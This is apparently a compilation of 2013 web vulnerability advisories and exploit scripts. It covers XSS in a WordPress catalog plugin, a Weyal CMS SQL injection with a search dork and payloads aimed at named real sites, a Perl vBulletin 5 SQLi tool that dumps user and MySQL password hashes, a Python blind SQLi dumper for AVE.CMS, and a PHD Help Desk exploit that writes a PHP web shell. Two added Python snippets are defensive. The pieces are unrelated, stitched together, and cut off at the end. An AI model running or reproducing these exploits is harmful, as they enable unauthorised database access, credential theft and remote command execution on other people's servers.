 value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>"  />
<input type="hidden" name="order_by" id="order_by"
 value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>"  />
------------------------[ source code end ]------------------------------------
 
Test:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog" method="post">
<input type="hidden" name="serch_or_not" value="search">
<input type="hidden" name="search_events_by_title" value='"><script>alert(111);</script>'>
<input type="hidden" name="asc_or_desc" value='"><script>alert(222);</script>'>
<input type="hidden" name="order_by" value='"><script>alert(333);</script>'>
<input type="submit" value="Test">
</form>
</center></body></html>
 
Result: JavaScript alert boxes (one per parameter) pop up, confirming the
reflected XSS.
 
 
###############################################################################
20. Reflected XSS in "spiderBox/spiderBox.js.php"
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Attack vectors:
  1. user-supplied GET parameters "delay","slideShowQ","allImagesQ", "spiderShop",
  "darkBG","juriroot"
Preconditions:
  1. PHP setting "register_globals=1"
 
 
Php script "spiderBox.js.php" line 243:
------------------------[ source code start ]----------------------------------
slideShowDelay=<?php echo $_GET['delay']; ?>;
slideShowQ=<?php echo $_GET['slideShowQ']; ?>;  
allImagesQ=<?php echo $_GET['allImagesQ']; ?>;
spiderShop=<?php echo isset($_GET['spiderShop'])?$_GET['spiderShop']:0; ?>;
darkBG=<?php echo $_GET['darkBG']; ?>;
keyOfOpenImage=-1;
spiderBoxBase="<?php echo urldecode($_GET['juriroot']); ?>/spiderBox/";
------------------------[ source code end ]------------------------------------
 
Tests:
 
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?delay=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?slideShowQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?allImagesQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?spiderShop=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?darkBG=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?juriroot=</script><script>alert(123);</script>
 
Result: JavaScript alert boxes pop up, confirming the reflected XSS.
 
The "juriroot" parameter deserves a closer look. PHP has already URL-decoded
the query string once when it filled $_GET, and the script then runs
urldecode() on the value a second time. A double URL-encoded payload therefore
contains no "<" or ">" in the request the browser actually sends (so the IE
Anti-XSS filter, which inspects the request URL, sees nothing to block), yet
it is fully decoded by the time it is written into the page:
 
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?juriroot=%253C%252Fscript%253E%253Cscript%253Ealert%2528123%2529%253B%253C%252Fscript%253E
 
 
###############################################################################
21. Reflected XSS in "catalog.php" function "spider_box_js_php()"
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Attack vectors:
  1. user-supplied GET parameters "delay","slideShowQ","allImagesQ", "spiderShop",
 "darkBG","juriroot"
Preconditions: none
 
Php script "catalog.php" line 1026:
------------------------[ source code start ]----------------------------------
add_action('wp_ajax_spiderboxjsphp', 'spider_box_js_php');
add_action('wp_ajax_nopriv_spiderboxjsphp', 'spider_box_js_php');
 
function spider_box_js_php(){
..
slideShowDelay=<?php echo $_GET['delay']; ?>;
slideShowQ=<?php echo $_GET['slideShowQ']; ?>;  
allImagesQ=<?php echo $_GET['allImagesQ']; ?>;
spiderShop=<?php echo isset($_GET['spiderShop'])?$_GET['spiderShop']:0; ?>;
darkBG=<?php echo $_GET['darkBG']; ?>;
keyOfOpenImage=-1;
spiderBoxBase="<?php echo urldecode($_GET['juriroot']); ?>/spiderBox/";
------------------------[ source code end ]------------------------------------
 
Tests:
 
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&delay=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&slideShowQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&allImagesQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&spiderShop=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&darkBG=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&juriroot=</script><script>alert(123);</script>
 
Result: JavaScript alert boxes pop up, confirming the reflected XSS.
 
Because spider_box_js_php() contains the same urldecode($_GET['juriroot']) call,
the double URL-encoding trick from section 20 (no "<" or ">" in the request URL,
so the IE Anti-XSS filter has nothing to match on) applies to this entry point
as well:
 
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&juriroot=%253C%252Fscript%253E%253Cscript%253Ealert%2528123%2529%253B%253C%252Fscript%253E
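Added example, not part of the advisory and not the plugin's code: a Python 3 model of the three sinks from sections 19 to 21 (a value dropped into an unquoted HTML attribute, a value dropped into bare JavaScript source, and a value that goes through a second urldecode()). It shows the encoder each sink needs and why the extra urldecode() defeats a filter that only looks at the request URL. Function and variable names are the example's own; the payloads are the ones from the tests above.

```python
import html
import json
from urllib.parse import unquote

# Payloads taken from the tests in sections 19-21.
ATTR_PAYLOAD = '"><script>alert(111);</script>'
JS_PAYLOAD = '</script><script>alert(123);</script>'
RAW_JURIROOT = ("%253C%252Fscript%253E%253Cscript%253Ealert"
                "%2528123%2529%253B%253C%252Fscript%253E")


def attr_vulnerable(value):
    """Mirrors section 19:  value="'.$serch_value.'"  (raw)."""
    return '<input type="text" name="search_events_by_title" value="%s">' % value


def attr_safe(value):
    """Encode quotes and angle brackets so the value cannot leave the attribute."""
    return '<input type="text" name="search_events_by_title" value="%s">' % html.escape(value, quote=True)


def js_vulnerable(delay):
    """Mirrors sections 20/21:  slideShowDelay=<?php echo $_GET['delay']; ?>;  (raw)."""
    return "<script>slideShowDelay=%s;</script>" % delay


def js_safe(delay):
    """Emit a JSON literal with '<', '>' and '&' as \\uXXXX escapes (the effect of
    PHP's json_encode($v, JSON_HEX_TAG|JSON_HEX_AMP)). A number stays a number;
    anything else becomes a string literal that can never contain '</script>'."""
    literal = json.dumps(delay)
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return "<script>slideShowDelay=%s;</script>" % literal


def breaks_out_of_script(page):
    """True if the text between the <script> tags can close the script block."""
    inner = page[len("<script>"):-len("</script>")]
    return "</script" in inner.lower()


def escapes_attribute(page):
    """True if the rendered value contains a quote that ends the value="..." attribute."""
    inner = page.split('value="', 1)[1]
    return '"' in inner[:-2]          # everything but the closing quote and '>'


def double_decode(raw_query_value):
    """PHP decodes the query string once into $_GET; the plugin's urldecode() decodes
    it again. Returns (what $_GET holds, what reaches the page)."""
    once = unquote(raw_query_value)
    return once, unquote(once)


if __name__ == "__main__":
    print(attr_vulnerable(ATTR_PAYLOAD))
    print(attr_safe(ATTR_PAYLOAD))
    print(js_vulnerable(JS_PAYLOAD))
    print(js_safe(JS_PAYLOAD))
    print(double_decode(RAW_JURIROOT))
```

The first decode result of RAW_JURIROOT still has every dangerous character percent-encoded, which is exactly what a URL-level filter gets to inspect; only the second decode, inside the script, produces the closing tag.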

 
 
###############################################################################
22. Full Path Disclosure in multiple scripts
###############################################################################
 
Reason:
  1. the plugin's PHP files can be requested directly, outside WordPress; the
  first call to a WordPress function (current_user_can(), add_action()) is then
  fatal, and PHP prints the absolute path of the script in the error message
Preconditions:
  1. PHP setting "display_errors = On"
 
Tests:
 
http://localhost/wp351/wp-content/plugins/catalog/Categories.html.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Categories.html.php on line 3
 
http://localhost/wp351/wp-content/plugins/catalog/Categories.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Categories.php on line 3
 
http://localhost/wp351/wp-content/plugins/catalog/Products.html.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Products.html.php on line 3
 
http://localhost/wp351/wp-content/plugins/catalog/catalog.php
 
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog.php on line 11
 
http://localhost/wp351/wp-content/plugins/catalog/catalog_Options.html.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog_Options.html.php on line 3
 
http://localhost/wp351/wp-content/plugins/catalog/catalog_Options.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog_Options.php on line 3
 
http://localhost/wp351/wp-content/plugins/catalog/products.php
 
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\products.php on line 3
 
http://localhost/wp351/?s[]
 
Warning: stripslashes() expects parameter 1 to be string, array given in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog.php on line 42
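Added example, not from the advisory: a small Python 3 checker that pulls the leaked server-side path out of a PHP error page of the kind shown above, so a list of plugin URLs can be tested for Full Path Disclosure. The sample responses are constructed to look like the advisory's output (one with PHP's html_errors markup, one plain, one clean page); the POSIX-style path is an assumed alternative layout, and the function names are the example's own.

```python
import re

# PHP wraps parts of the message in <b>...</b> when html_errors=On; strip tags first.
TAG_RE = re.compile(r"<[^>]+>")
# "Fatal error: ... in <path> on line N", Windows (C:\...) or POSIX (/...) path.
PHP_ERROR_RE = re.compile(
    r"(?:Fatal error|Parse error|Warning|Notice):.*?\bin\s+"
    r"(?P<path>(?:[A-Za-z]:\\|/)[^\r\n]*?)\s+on line\s+(?P<line>\d+)",
    re.S,
)


def disclosed_path(body):
    """Return (path, line) if the response body leaks a server-side path, else None."""
    m = PHP_ERROR_RE.search(TAG_RE.sub("", body))
    if not m:
        return None
    return m.group("path"), int(m.group("line"))


def webroot_from(path):
    """Recover the WordPress document root from a leaked plugin path."""
    idx = path.replace("\\", "/").find("wp-content")
    return None if idx < 0 else path[:idx].rstrip("/\\")


def scan(fetch, urls):
    """fetch(url) -> body text. Returns {url: (path, line)} for every URL that leaks."""
    findings = {}
    for url in urls:
        hit = disclosed_path(fetch(url))
        if hit:
            findings[url] = hit
    return findings


# Constructed sample responses; a real run would replace the lambda in scan()
# with an HTTP GET of each URL.
WIN_URL = "http://localhost/wp351/wp-content/plugins/catalog/catalog.php"
POSIX_URL = "http://localhost/wp351/?s[]"
CLEAN_URL = "http://localhost/wp351/"
SAMPLES = {
    WIN_URL: ("<br />\n<b>Fatal error</b>:  Call to undefined function add_action() in "
              "<b>C:\\apache_www\\wp351\\wp-content\\plugins\\catalog\\catalog.php</b>"
              " on line <b>11</b><br />\n"),
    POSIX_URL: ("Warning: stripslashes() expects parameter 1 to be string, array given in "
                "/var/www/wp351/wp-content/plugins/catalog/catalog.php on line 42\n<html>...</html>"),
    CLEAN_URL: "<html><body>Nothing to see here. Error in line 3 of the poem.</body></html>",
}


if __name__ == "__main__":
    for url, (path, line) in scan(lambda u: SAMPLES[u], SAMPLES).items():
        print(url, "->", path, "line", line, "webroot", webroot_from(path))
```

The path prefix test (drive letter or leading slash) keeps the regex from matching ordinary prose that happens to contain "in" and "on line", as the clean sample shows.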
 
 
 
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
come2waraxe () yahoo com
Janek Vind "waraxe"
 
Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/

Weyal CMS SQL Injection

================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork:  intext:"Designed by Rohi.af"
      intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page:  fullstory.php?id= , countrys.php?countryid= , "check other pages :) "
 
[+] Vuln:  www.[site].com/[path]/fullstory.php?id=SQLi
      www.[site].com/[path]/countrys.php?countryid=SQLi
 
[+] Demo:  http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo:  http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo:  http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================

vBulletin 5b SQL Injection

#!/usr/bin/perl
###################################################################################
#                                                           Saturday, March 30, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#      
#                       [P]roof [o]f [C]oncept, SQL Injection
#     vBulletin™ is the world leader in forum and community publishing software.
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
# UberLame .......> Provided all proper payloads
# Stealth ........> Thanks ;) 
#
###################################################################################
#  SUMMARY     #
################
# 
# http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
#
# Database error in vBulletin 5.0.0 Beta 28:
# MySQL Error   : Duplicate entry '#5.1.67#1' for key 'group_key'
# Error Number  : 1062
# Request Date  : Saturday, March 30th 2013 @ 01:13:40 AM
# Error Date    : Saturday, March 30th 2013 @ 01:13:41 AM
# Script        : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
#
################
#  VULNERABLE  #
################
#
#  vBulletin 5 beta [ALL] - http://vbulletin.com
#
################
#  CONFIRMED   #
################
#
#  vBulletin 5 beta 17
#  vBulletin 5 beta 28
#
################
#  CVE         #
################
#
#  There is no CVE reported.
#
################
#  PATCH       #
################
#
#  There is no PATCH available.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Folder, User, Password, Number and the script will
# login and deliver the payload...
#
# [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
#
###################################################################################
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
###############################################################################
#'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
#..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
#:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
#::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
#:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
#: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
# ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
#........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
###############################################################################
 
[?] Homepage: http://www.zempirians.com
[?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
[?] Affected: vBulletin 5 Beta XX SQLi 0day
[?] Irc Server: irc.zempirians.com +6697
 
";
if (@ARGV != 5) {
    print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
    print "\r\n";
    exit;
}
$host        = $ARGV[0];
$path        = $ARGV[1];
$username    = $ARGV[2];
$password    = $ARGV[3];
$magicnum    = $ARGV[4];
$encpath     = encode_base64('http://'.$host.$path, '');   # '' = no trailing newline in the value
 
print "\n";
print "[+] Establishing connection and logging in\n";
 
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
# Attach the cookie jar before logging in, otherwise the session cookie set by
# the login response is discarded and the payload requests go out unauthenticated.
$browser->cookie_jar( $cookie_jar );
 
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
# Error-based extraction: grouping on concat(<value>, floor(rand(0)*2)) makes
# MySQL raise "Duplicate entry '#<value>#1' for key 'group_key'" (see SUMMARY),
# so the value comes back inside the error page between '#' markers, which the
# regex after each request picks out.
print "[+] Send payload [ 1 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataA = $response->content;
if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
    $fixversion = $1;
    $fixversion =~ s/\#//g;
    # vBulletin version string ("vBulletin 5.0.0 Beta 28") read from a fixed
    # offset in the "Database error in ..." page; adjust if the page layout differs.
    $fixvb = substr($dataA, 58, 23);
};
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataAB = $response->content;
        if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbdb = $1;
                 $fixvbdb =~ s/\#//g;
        };
 
 
print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
print "\n";
 
print "[+] Send payload [ 2 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataB = $response->content;
  if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
    $fixuserhost = $1;
    $fixuserhost =~ s/\#//g;
    print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
  };
print "\n";
 
print "[+] Send payload [ 3 of 4 ]\n";
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataC = $response->content;
        if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbuser = $1;
                $fixvbuser =~ s/\#//g;
  };
 
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataD = $response->content;
        if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbpass = $1;
                $fixvbpass =~ s/\#//g;
        };
 
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataE = $response->content;
        if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbsalt = $1;
                $fixvbsalt =~ s/\#//g;
        };
 
 
print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
print "\n";
 
print "[+] Send payload [ 4 of 4 ]\n";
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataF = $response->content;
        if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqluser = $1;
                $fixsqluser =~ s/\#//g;
        };
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataG = $response->content;
        if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqlpass = $1;
                $fixsqlpass =~ s/\#//g;
        };
 
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    'User-Agent' => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
 
$dataH = $response->content;
        if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
                 $fixsqlhost = $1;
                $fixsqlhost =~ s/\#//g;
        };
 
 
print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';
 
#print "\n\n[?] Error dump - payload 1\n\n";
#print $dataAB;
 
print "\n\n";
 
exit 1;

AVE.CMS 2.09 Blind SQL Injection

#!/usr/bin/env python
# Python 2 script (print statement, raw_input, urllib.urlopen).
 
import urllib, sys, time
 
#######################################################################################
# Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit
# Date: 23/05/2013
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Vendor Homepage: http://www.overdoze.ru/
# Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09
# Version: V2.09 and 2.09RC2
# Tested on: Linux Debian 2.6.32-5-686
# Description: The "module" parameter is vulnerable to Blind SQL Injection.
# Solution : Update to newest version.
#######################################################################################
 
print "+----------------------------------------------------------+"
print "|    AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit  |"
print "|            mr.pr0n - http://ghostinthelab.wordpress.com  |"
print "+----------------------------------------------------------+"
 
##
GREEN   = '\033[32m'
RESET   = '\033[0;0m'
##
 
########
# Boolean oracle: "-1%00' OR ORD(MID(...,pos,1))>i#" selects a row while the
# comparison is true; once it turns false the CMS answers with its 404 page.
# Walking i upwards, the first response containing "404" is at i == ORD(char).
marker     = "404"
ord_min    = 32
ord_max    = 127
num_of_ltr = 50
########
 
url = raw_input("\nEnter the address of the target AVE.CMS\n> ")
if url[:7] != "http://":
    url = "http://" + url + "/index.php?module="
else:
    url = url + "/index.php?module="
 
database = []
options = {'Version': 'VERSION', 'User': 'CURRENT_USER', 'Database': 'DATABASE'}
sys.stdout.write("[+] Checking target... (please wait)...")
for element in options:
    sys.stdout.write("\n  [!] Database " + element + "  : ")
    for letter in range(1, num_of_ltr):
        for i in range(ord_min, ord_max):
            query = "-1%00' OR ORD(MID((" + options[element] + "())," + str(letter) + ",1))>" + str(i) + "#"
            target = url + query
            result = urllib.urlopen(target).read()
            if result.find(marker) != -1:
                if options[element] == "DATABASE":
                    database.append(chr(i))
                sys.stdout.write(GREEN + chr(i) + RESET)
                sys.stdout.flush()
                break
        time.sleep(1)   # short pause between characters
# MID() past the end of the string gives '', ORD('') is 0, so the loop above
# records a space there; drop those before reusing the name.
database = [i for i in database if i != ' ']
database = ''.join(database)
hexdatabase = database.encode("hex")
 
prefix = []
sys.stdout.write("\n[+] Checking for (random) Table Prefix... (please wait)... ")
sys.stdout.write("\n  [!] Table Prefix (for '" + GREEN + database + RESET + "' database) : ")
for letter in range(1, num_of_ltr):
    # Only the first six characters of one table name are needed for the prefix.
    for letter2 in range(1, 7):
        for i in range(ord_min, ord_max):
            query = ("-1%00' OR ORD(MID((SELECT CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES"
                     " WHERE table_schema=0x" + hexdatabase + " LIMIT " + str(letter) + ",1),"
                     + str(letter2) + ",1))>" + str(i) + "#")
            target = url + query
            result = urllib.urlopen(target).read()
            if result.find(marker) != -1:
                prefix.append(chr(i))
                sys.stdout.write(GREEN + chr(i) + RESET)
                sys.stdout.flush()
                break
        time.sleep(1)
    break   # one table name is enough
prefix = [i for i in prefix if i != ' ']
prefix = ''.join(prefix)
 
columns = {'Password': 'password', 'Email': 'email', 'Username': 'user_name', 'Salt': 'salt'}
sys.stdout.write("\n[+] Dumping '" + GREEN + prefix + "users" + RESET + "' table... (please wait)...")
for element in columns:
    sys.stdout.write("\n  [!] Column : " + element + "  : ")
    for letter in range(1, num_of_ltr):
        for i in range(ord_min, ord_max):
            query = ("-1%00' OR ORD(MID((SELECT CONCAT(" + columns[element] + ") FROM " + database + "."
                     + prefix + "users ORDER BY Id LIMIT 0,1)," + str(letter) + ",1))>" + str(i) + "#")
            target = url + query
            result = urllib.urlopen(target).read()
            if result.find(marker) != -1:
                sys.stdout.write(GREEN + chr(i) + RESET)
                sys.stdout.flush()
                break
        time.sleep(1)
 
sys.stdout.write("\n[+] End of POC...\n")
#eof

PHD Help Desk 2.12 SQL Injection

# Exploit Title: PHD Help Desk 2.12 SQLi
# Date: 05/24/2013
# Exploit Author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html
# Vendor Homepage: http://www.p-hd.com.ar/
# Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip
# Version: 2.12
# Tested on: Ubuntu 12.04 (apparmor disabled)
 
""" This app is so full of SQLi & XSS; if you're looking for
    practice with real web apps, this is a good place to go.
 
    You don't need auth for this.
"""
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys
 
def run(options):
    print '[!] Dropping web shell on %s...'%(options.ip)
 
    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
 
    # The hex literal below is  <?php system($_GET["rr"]);?>  . Writing it with
    # INTO OUTFILE requires the FILE privilege on the MySQL account, a
    # secure_file_priv setting that does not exclude the target directory, and a
    # directory the MySQL server process itself (not the web server) can write to.
    data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'
                                    ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'
                                        ' \'{0}/{1}.php'.format(options.path,shell)),
                             'contrasenia':'pass',
                             'submit':'Enter',
                             'captcha':''})
 
    urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)
    print '[!] Shell dropped.  http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)
 
def parse():
    parser = ArgumentParser()
    parser.add_argument('-i',help='server address',action='store',dest='ip')
    parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',
                default='/phd_2_12', dest='rootp')
    parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',
                default='/var/www/phd_2_12/', action='store', dest='path')
 
    options = parser.parse_args()
    if not options.ip:
        parser.print_help()
        sys.exit(1)
 
    # strip a trailing slash from both paths (the original checked options.path twice)
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.rootp[-1] != '/' else options.rootp[:-1]
    return options
 
if __name__=="__main__":
    run(parse())

NanoBB 0.7 Cross Site Scripting / SQL Injection

# Exploit Title   : NanoBB 0.7 Multiple Vulnerabilities
# Date            : 10 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://nanobb.sourceforge.net/
# Software Link   : heanet.dl.sourceforge.net/project/nanobb/v0.7.zip
# Version         : 0.7
# Tested on       : Windows and Linux
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
